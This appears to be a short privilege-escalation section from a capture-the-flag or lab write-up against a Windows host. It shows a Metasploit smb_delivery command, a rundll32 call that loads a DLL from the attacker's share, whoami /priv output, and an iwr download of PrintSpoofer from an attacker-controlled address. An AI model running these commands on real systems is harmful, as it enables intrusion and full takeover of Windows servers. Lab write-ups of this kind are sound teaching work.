Priv Esc

Upgrade shell

adot@pwndot:~$ msfconsole -q -x 'use exploit/windows/smb/smb_delivery; set LHOST tun0; set LPORT 8443; set SRVHOST 10.10.14.18; run'

PS C:\windows\system32\inetsrv> rundll32.exe \\10.10.14.18\WTLqo\test.dll,0

PS C:\Users> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\ProgramData> iwr http://10.10.14.18/PrintSpoofer32.exe -o PrintSpoofer.exe
iwr http://10.10.14.18/PrintSpoofer32.exe -o PrintSpoofer.exe

PreviousFoothold NextCredentials

Last updated 4 months ago

Was this helpful?